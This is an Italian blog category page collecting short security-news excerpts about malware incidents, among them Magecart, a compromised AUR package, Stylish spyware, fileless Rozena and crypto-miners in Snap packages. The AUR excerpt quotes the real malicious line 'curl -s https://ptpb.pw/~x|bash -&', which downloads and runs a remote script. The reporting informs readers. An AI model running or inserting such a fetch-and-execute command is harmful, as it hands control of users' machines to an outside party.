Archivi categoria: malware

Non solo Ticketmaster: i pirati hanno colpito 800 siti di e-commerce

Sorgente: Securityinfo.it | Autore: Marco Schiaffino

L’attacco al sito per la vendita di biglietti per concerti ed eventi fa parte di una campagna più ampia del gruppo criminale Magecart. Il furto di carte di credito ai danni dei clienti di Ticketmaster è solo la punta di un iceberg che potrebbe aver coi...

Leggi il resto dell'articolo su: https://www.securityinfo.it

Trovato malware nel repository AUR di Arch Linux

Sorgente: Mia mamma usa Linux! | Autore: Elena Metelli

Due settimane fa era toccato ad uno dei mirror dei repository di Gentoo; oggi la notizia che anche Arch User Repository (AUR) è stato compromesso. AUR permette l’installazione di software non ufficialmente supportato da Arch; i pacchetti ospitati sono praticamente delle “ricette” per verificare (e installare) le dipendenze, quindi scaricare, se necessario compilare, ed infine pacchettizzare il software richiesto; a questo punto pacman (il gestore di pacchetti di Arch) può installarlo come qualsiasi altro pacchetto. Calma, però: a differenza di Gentoo, dove il numero di pacchetti modificati è stato tanto consistente da considerare il repository come “totalmente compromesso”, per Arch sembra che i pacchetti contenenti codice malevolo si contino sulle dita di una mano (per ora). Un utente ha segnalato tramite la mailing list di Arch una variazione nel pacchetto acrored presente in AUR: il pacchetto, pur risultando “orfano” (ovvero senza maintainer, un utente di riferimento che lo gestisse), era stato modificato improvvisamente il 7 Luglio dall’utente “xeactor”, aggiungendo del codice assolutamente non sospetto: curl -s https://ptpb.pw/~x|bash -& L’utente medio di Arch, lo sappiamo (ed ogni riferimento ad altri autori del blog è puramente casuale, ndr), adora leggersi il contenuto dei pacchetti tra una compilazione e l’altra, dunque inutile dire che il problema [...]

Leggi il resto dell'articolo su: https://www.miamammausalinux.org

L’estensione ha uno spyware. Chrome e Firefox bloccano Stylish

Sorgente: Securityinfo.it | Autore: Marco Schiaffino

Il proprietario di Stylish ha cambiato le policy lo scorso gennaio e nelle nuove versioni registrava l’attività Web degli utenti. Non è la prima volta che succede e, purtroppo, è probabile che non sia nemmeno l’ultima. I casi in cui i nuovi proprietari...

Leggi il resto dell'articolo su: https://www.securityinfo.it

Arrivano i primi attacchi che sfruttano i file Windows Settings Shortcut

Sorgente: Securityinfo.it | Autore: Marco Schiaffino

È passata solo una settimana dall’allarme dei ricercatori sull’uso del nuovo formato file per portare attacchi a Windows, ma i pirati sono già al lavoro. È quasi confortante sapere che certe dinamiche, nel mondo della sicurezza, si verificano con una p...

Leggi il resto dell'articolo su: https://www.securityinfo.it

Il malware Rozena si evolve e diventa fileless

Sorgente: Securityinfo.it | Autore: Marco Schiaffino

La nuova versione del trojan usa tecniche che gli consentono di compromettere il computer della vittima senza copiare file sul disco. Quando si parla di attacchi “fileless” ci si può riferire a diversi tipi di minacce. In molti casi, infatti, si tratta...

Leggi il resto dell'articolo su: https://www.securityinfo.it

Symantec rilascia un tool per individuare VPNFilter

Sorgente: Securityinfo.it | Autore: Marco Schiaffino

La società di sicurezza mette a disposizione uno strumento che consente di rilevare le comunicazioni dai router infetti. Sono ancora migliaia… La vicenda VPNFilter è sparita dalle pagine dei siti di news, ma è ben lontana dall’essersi conclusa. L’ennes...

Leggi il resto dell'articolo su: https://www.securityinfo.it

Trovato un malware in Ubuntu Snap Store: l’inizio della fine?

Sorgente: Mia mamma usa Linux! | Autore: Matteo Cappadonna

Recentemente gli amici di Canonical stanno puntando tutto sugli Snap, quei pacchetti che, di fatto, contengono tutto il necessario per l’esecuzione di un dato software, comprese le librerie, e che dovrebbero rendere meno impattante l’aggiornamento di app differenti che utilizzano la stessa “base”. Che sia per le live patch del Kernel o per la distribuzione di software di utilità, gli Snap oramai sembrano diventare sempre di più la norma per la distribuzione Ubuntu, al punto che si trovano facilmente direttamente in Ubuntu Software, l’applicazione integrata per l’installazione di pacchetti dallo “store” ufficiale. E’ saltato fuori recentemente che un paio di applicazioni distribuite come Snap, e presenti proprio in Ubuntu Software, contenessero anche un miner di criptovalute, ovvero un piccolo software che, sedendosi in background, utilizzava le risorse del computer ospite per cercare di generare, appunto, criptovalute (Bitcoin, Ethercoin, etc.). La cosa preoccupante non è data solo da questo comportamento, ma anche dal fatto che lo stesso processo di mining si mascherasse come un demone systemd e che, oltre a questo, gli snap si occupassero di installare uno script che venendo eseguito in fase di boot, caricava il software direttamente in background, eseguendolo anche se l’applicazione fornita dallo stesso snap non [...]

Leggi il resto dell'articolo su: https://www.miamammausalinux.org